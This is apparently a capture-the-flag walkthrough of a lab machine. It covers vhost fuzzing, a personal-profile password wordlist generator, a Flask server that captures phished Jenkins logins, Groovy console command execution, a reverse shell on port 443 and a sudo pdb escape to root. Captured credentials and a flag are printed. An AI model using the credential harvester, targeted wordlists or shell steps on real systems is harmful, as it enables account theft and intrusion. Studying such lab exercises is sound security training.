❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08   VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57   VMware, Inc.
192.168.60.189  08:00:27:5a:67:6d   PCS Systemtechnik GmbH
192.168.60.254  00:50:56:fd:65:82   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.031 seconds (126.05 hosts/sec). 4 responded

❯ export ip=192.168.60.189
❯ rustscan -a $ip
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Exploring the digital landscape, one IP at a time.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.189:22
Open 192.168.60.189:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-17 14:51 CST
Initiating ARP Ping Scan at 14:51
Scanning 192.168.60.189 [1 port]
Completed ARP Ping Scan at 14:51, 0.13s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:51
Completed Parallel DNS resolution of 1 host. at 14:51, 0.00s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:51
Scanning 192.168.60.189 [2 ports]
Discovered open port 80/tcp on 192.168.60.189
Discovered open port 22/tcp on 192.168.60.189
Completed SYN Stealth Scan at 14:51, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.60.189
Host is up, received arp-response (0.00061s latency).
Scanned at 2025-02-17 14:51:07 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:5A:67:6D (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
Open port 80 in a browser.
Edit the hosts file and add the domain:
❯ sudo vim /etc/hosts
192.168.60.189 phisermansphriends.thl
A directory scan turns up nothing but index.html. The page only says (in Spanish) that the site is being modified and lists two contact e-mail addresses:
❯ curl http://phisermansphriends.thl
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<p>Estamos modificando la web. Contacto: [email protected] y [email protected]</>
</body>
</html>
❯ wfuzz -c -u "http://phisermansphriends.thl" -H "Host:FUZZ.phisermansphriends.thl" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hw 28
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://phisermansphriends.thl/
Total requests: 114441

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000002:   200        96 L     337 W      5367 Ch     "mail"
000000058:   403        5 L      13 W       589 Ch      "intranet"

Total time: 61.76252
Processed Requests: 114441
Filtered Requests: 114435
Requests/sec.: 1852.919
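The wfuzz run above finds virtual hosts by varying only the Host header and hiding every response that looks like the default site (--hw 28 hides the 28-word index page). The same logic in Python, as an added example that is not part of the original writeup: the default page is fetched once as a baseline and every candidate whose (status, word count) differs is reported. The FakeVhostHandler is a constructed stand-in for the target so the block runs offline; which names it answers for, and what it answers, are assumptions and not the real server's behaviour.

```python
"""Host-header virtual-host discovery (added example; not the writeup's own code)."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


def fetch(host_ip, port, vhost, path="/", timeout=5):
    """GET `path` from host_ip:port while presenting `vhost` in the Host header.
    http.client does not add its own Host header when one is supplied."""
    conn = http.client.HTTPConnection(host_ip, port, timeout=timeout)
    try:
        conn.request("GET", path, headers={"Host": vhost})
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


def fuzz_vhosts(host_ip, port, domain, words):
    """Return {vhost: (status, word_count)} for every candidate whose response differs
    from the default site, the same signal wfuzz's --hw filter keys on."""
    base_status, base_body = fetch(host_ip, port, domain)
    baseline = (base_status, len(base_body.split()))
    hits = {}
    for word in words:
        vhost = f"{word}.{domain}"
        status, body = fetch(host_ip, port, vhost)
        signature = (status, len(body.split()))
        if signature != baseline:
            hits[vhost] = signature
    return hits


class FakeVhostHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for the target: the answer depends on the Host header.
    Names and bodies are assumptions made for this example."""
    DEFAULT = b"<html><body><p>Estamos modificando la web.</p></body></html>"

    def do_GET(self):
        host = self.headers.get("Host", "").split(":")[0]
        if host.startswith("mail."):
            status, body = 200, b"<html><body><form>login</form>" + b" word" * 40 + b"</body></html>"
        elif host.startswith("intranet."):
            status, body = 403, b"<html><body><h1>Forbidden</h1></body></html>"
        else:
            status, body = 200, self.DEFAULT
        self.send_response(status)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo output to the hits only
        pass


def demo():
    """Run the fuzzer against the constructed fake on an ephemeral loopback port."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), FakeVhostHandler)
    port = server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return fuzz_vhosts("127.0.0.1", port, "phisermansphriends.thl",
                           ["www", "mail", "intranet", "dev"])
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for vhost, (status, words) in demo().items():
        print(f"{status} {words:4d} W  {vhost}")
```

Against a real target, point `fuzz_vhosts` at the IP from the hosts file and feed it the same seclists wordlist; comparing against a baseline rather than a fixed word count keeps the filter valid when the default page changes.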
Add the two new virtual hosts to the hosts file:
❯ sudo vim /etc/hosts
192.168.60.189 phisermansphriends.thl mail.phisermansphriends.thl intranet.phisermansphriends.thl
[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: Mur
> Surname: Rusko
> Nickname: mur.rusko
> Birthdate (DDMMYYYY): 20051990

> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):

> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):

> Pet's name: Rufo
> Company name: PhisermansPhriends

> Do you want to add some key words about the victim? Y/[N]: n
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to mur.txt, counting 3252 words.
> Hyperspeed Print? (Y/n) :
[+] Now load your pistolero with mur.txt and shoot! Good luck!
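The interactive run above is cupp building a targeted wordlist from the personal details found so far (name, nickname, birthdate, pet, company). As an added example, and not cupp's code or the writeup's, here is the same kind of generator written out: tokens from the profile in several casings, pairwise concatenations, date fragments and common numeric suffixes, optional trailing special characters and an optional leet pass. The exact combination rules are this example's own choices, so the resulting list differs from cupp's 3252 words.

```python
"""Profile-based password wordlist (added example, cupp-style; not cupp itself)."""
import itertools

# Profile values as entered in the cupp session above.
MUR_PROFILE = {
    "first_name": "Mur",
    "surname": "Rusko",
    "nickname": "mur.rusko",
    "birthdate": "20051990",   # DDMMYYYY, as cupp asks for it
    "pet": "Rufo",
    "company": "PhisermansPhriends",
}

# Leet substitutions applied when leet=True (assumed set, similar in spirit to cupp's).
LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5", "t": "7"})


def date_parts(ddmmyyyy):
    """'20051990' -> ['20', '05', '1990', '90', '2005', '051990', '20051990'];
    an empty or malformed birthdate contributes nothing."""
    if len(ddmmyyyy) != 8 or not ddmmyyyy.isdigit():
        return []
    dd, mm, yyyy = ddmmyyyy[:2], ddmmyyyy[2:4], ddmmyyyy[4:]
    return [dd, mm, yyyy, yyyy[2:], dd + mm, mm + yyyy, dd + mm + yyyy]


def build_profile_wordlist(profile, special_chars="", leet=False, min_len=4):
    """Return a sorted, de-duplicated list of candidate passwords for one person."""
    # 1. Base tokens: each field as a whole plus its dot/underscore-separated parts.
    tokens = set()
    for key in ("first_name", "surname", "nickname", "pet", "company"):
        value = profile.get(key, "").strip()
        if not value:
            continue
        tokens.add(value.lower())
        tokens.update(p.lower() for p in value.replace(".", " ").replace("_", " ").split())

    # 2. Casing variants and ordered pairs of tokens.
    cased = set()
    for t in tokens:
        cased.update((t, t.capitalize(), t.upper()))
    for a, b in itertools.permutations(sorted(tokens), 2):
        cased.update((a + b, a.capitalize() + b.capitalize(), a + "." + b, a + "_" + b))

    # 3. Numeric affixes: birthdate fragments plus the usual lazy suffixes.
    numbers = date_parts(profile.get("birthdate", "")) + ["123", "1234", "12345", "123456"]
    candidates = set(cased)
    for word in cased:
        candidates.update(word + n for n in numbers)
        candidates.update(n + word for n in numbers)
        candidates.update(word + c for c in special_chars)

    # 4. Optional leet pass over everything generated so far.
    if leet:
        candidates.update(word.translate(LEET) for word in tuple(candidates))

    return sorted(c for c in candidates if len(c) >= min_len)


if __name__ == "__main__":
    words = build_profile_wordlist(MUR_PROFILE, special_chars="!@#", leet=True)
    print(f"{len(words)} candidates; e.g. {words[:5]}")
```

The list is meant to be fed to whatever authenticates the victim's accounts, so keep it small and profile-specific rather than padding it with a generic dictionary; the value of a profile list is that it is short.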
from flask import Flask, request

app = Flask(__name__)


@app.route('/', methods=['POST'])
def handle_post():
    # Read the fields the Jenkins login form posts (j_username / j_password)
    username = request.form.get('j_username')
    password = request.form.get('j_password')
    # Print them to the console
    print(f"Received POST request with j_username: {username}, j_password: {password}")
    return f"Received POST request with j_username={username}&j_password={password}"


if __name__ == "__main__":
    app.run(host='0.0.0.0', port=80)
Run the Python listener.
To be honest, the administrator doesn't visit right after the mail is sent; it takes about two minutes.
❯ python jenkins.py
 * Serving Flask app 'jenkins'
 * Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:80
 * Running on http://192.168.60.100:80
Press CTRL+C to quit
192.168.60.189 - - [17/Feb/2025 23:36:02] "GET / HTTP/1.1" 405 -
Received POST request with j_username: admin, j_password: RqykJVKDt2RBjnR2q1zeIMYm
192.168.60.189 - - [17/Feb/2025 23:36:17] "POST / HTTP/1.1" 200 -
Command execution
With the captured credentials, log in to Jenkins.
Try running commands from the Groovy script console.
It works.
User privilege escalation
Reverse shell: start a listener on port 4444.
But the shell never comes back.
My guess is that a firewall is in place and outbound connections on other ports aren't allowed.
Try port 443 instead:
❯ pwncat-cs -lp 443
[00:00:14] Welcome to pwncat 🐈!                                            __main__.py:164
[00:00:35] received connection from 192.168.60.189:40254                        bind.py:84
[00:00:35] 192.168.60.189:40254: registered new host w/ db                  manager.py:957
(local) pwncat$
(remote) jenkins@TheHackersLabs-phisermansphriends:/var/lib/jenkins$ cat /etc/passwd|grep /bin/bash
root:x:0:0:root:/root:/bin/bash
mur:x:1000:1000:Mur Rusko,,,:/home/mur:/bin/bash
jenkins:x:106:115:Jenkins,,,:/var/lib/jenkins:/bin/bash
sysadmin:x:1001:1001:sysadmin,,,:/home/sysadmin:/bin/bash
/etc/passwd also gives us two more users with a login shell: mur and sysadmin.
I tried switching to mur with the password obtained above.
That gives us the user flag.
(remote) jenkins@TheHackersLabs-phisermansphriends:/var/lib/jenkins$ su mur
Contraseña:
mur@TheHackersLabs-phisermansphriends:/var/lib/jenkins$ cd ~
mur@TheHackersLabs-phisermansphriends:~$ ls -al
total 32
drwx------ 3 mur  mur  4096 ago 30 04:54 .
drwxr-xr-x 5 root root 4096 ago 30 03:50 ..
lrwxrwxrwx 1 mur  mur     9 ago 30 03:40 .bash_history -> /dev/null
-rw-r--r-- 1 mur  mur   220 ago 29 14:23 .bash_logout
-rw-r--r-- 1 mur  mur  3526 ago 29 14:23 .bashrc
drwxr-xr-x 3 mur  mur  4096 ago 30 03:55 .local
-r-------- 1 mur  mur    34 ago 30 04:54 .password
-rw-r--r-- 1 mur  mur   807 ago 29 14:23 .profile
-r-------- 1 mur  mur    33 ago 30 03:55 user.txt
mur@TheHackersLabs-phisermansphriends:~$ cat user.txt
b3991c5298d0971041e00991c5dc0cfc
Root privilege escalation
The home directory also holds a hidden .password file; rather than a password, it contains a single line of Python comparing a password to 'SuperSecretPass'.
And mur has sudo rights:
mur@TheHackersLabs-phisermansphriends:~$ cat .password
if password != 'SuperSecretPass':
mur@TheHackersLabs-phisermansphriends:~$ sudo -l
sudo: unable to resolve host TheHackersLabs-phisermansphriends.thl: Fallo temporal en la resolución del nombre
Matching Defaults entries for mur on TheHackersLabs-phisermansphriends:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User mur may run the following commands on TheHackersLabs-phisermansphriends:
    (ALL) NOPASSWD: /usr/bin/python3 /opt/util.py
But /opt/util.py is readable only by root (-r--------), so we can run it through sudo but not read it:
mur@TheHackersLabs-phisermansphriends:~$ cd /opt/
mur@TheHackersLabs-phisermansphriends:/opt$ ls -al
total 12
drwxr-xr-x  2 root root 4096 ago 31 12:47 .
drwxr-xr-x 18 root root 4096 ago 29 14:22 ..
-r--------  1 root root 1372 ago 31 12:47 util.py
Running it prints "Escuchando en localhost:443" (listening on localhost:443): the script opens port 443, but bound to localhost, so it is reachable only from the box itself. On the second run a client connected and sent bytes that are not valid UTF-8; the .decode() on line 18 (the same comparison against 'SuperSecretPass' that the .password file hinted at) raises UnicodeDecodeError, and the script drops into an interactive pdb prompt, in a process that sudo started as root.
mur@TheHackersLabs-phisermansphriends:~$ sudo /usr/bin/python3 /opt/util.py
sudo: unable to resolve host TheHackersLabs-phisermansphriends.thl: Fallo temporal en la resolución del nombre
Escuchando en localhost:443
mur@TheHackersLabs-phisermansphriends:~$ sudo /usr/bin/python3 /opt/util.py
sudo: unable to resolve host TheHackersLabs-phisermansphriends.thl: Fallo temporal en la resolución del nombre
Escuchando en localhost:443
'utf-8' codec can't decode byte 0xfc in position 8: invalid start byte
> /opt/util.py(18)<module>()
-> if clientsock.recv(1024).strip().decode() != 'SuperSecretPass':
(Pdb) --KeyboardInterrupt--
(Pdb)
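The trace above shows the whole failure mode: a strict UTF-8 decode on untrusted socket input, and an error path that opens a post-mortem debugger inside a process running as root. The block below is an added example, not the contents of /opt/util.py (which is root-only and never shown on the page): it reproduces only what the trace reveals, the comparison on line 18 and the pdb prompt that follows an exception there, and puts a hardened check next to it. The listener around it is this example's guess at the surrounding shape; the fixed port and message match the output above.

```python
"""Unsafe vs. hardened password check for a socket service (added example; not util.py)."""
import hmac
import pdb
import socket

SECRET = "SuperSecretPass"   # literal visible in both .password and the pdb trace


def check_secret_unsafe(data: bytes) -> bool:
    """Same expression as line 18 of the trace. bytes.decode() defaults to strict UTF-8,
    so input that is not valid UTF-8 raises UnicodeDecodeError instead of comparing unequal."""
    return data.strip().decode() == SECRET


def probe_unsafe(data: bytes) -> str:
    """Run the unsafe check and report what happened, making the error path observable."""
    try:
        return "ok" if check_secret_unsafe(data) else "denied"
    except UnicodeDecodeError as exc:
        return f"UnicodeDecodeError at byte {exc.start}"


def check_secret_safe(data: bytes) -> bool:
    """Hardened check: malformed bytes are just a wrong password, and the comparison is
    constant-time so the secret cannot be recovered byte by byte through timing."""
    try:
        text = data.strip().decode("utf-8")
    except UnicodeDecodeError:
        return False
    return hmac.compare_digest(text.encode(), SECRET.encode())


def serve(handler, host="localhost", port=443, debug_on_error=False):
    """One-shot listener (assumed shape of the service). With debug_on_error=True it
    reproduces the pattern in the trace: an exception in the client handler opens a
    post-mortem pdb session in the same process. Started via sudo, that hands whoever
    is at the terminal a Python prompt with the service's privileges. The safe
    configuration logs the error and drops the connection instead."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        print(f"Escuchando en {host}:{port}")
        clientsock, _ = srv.accept()
        with clientsock:
            try:
                data = clientsock.recv(1024)
                clientsock.sendall(b"OK\n" if handler(data) else b"DENIED\n")
            except Exception as exc:            # the error path is the point of the example
                print(exc)
                if debug_on_error:
                    pdb.post_mortem()           # interactive debugger as the service user


if __name__ == "__main__":
    # Eight valid bytes then 0xfc: fails at position 8, exactly as in the trace above.
    print(probe_unsafe(b"AAAAAAAA\xfc"))
    print(check_secret_safe(b"AAAAAAAA\xfc"), check_secret_safe(b"SuperSecretPass\n"))
```

For a privileged service the two fixes are independent and both matter: treat undecodable input as a failed check rather than an exception, and never leave a debugger (pdb, a `python3 -m pdb` wrapper, or an exception hook that calls post_mortem) reachable from an error path in code that sudo lets unprivileged users start.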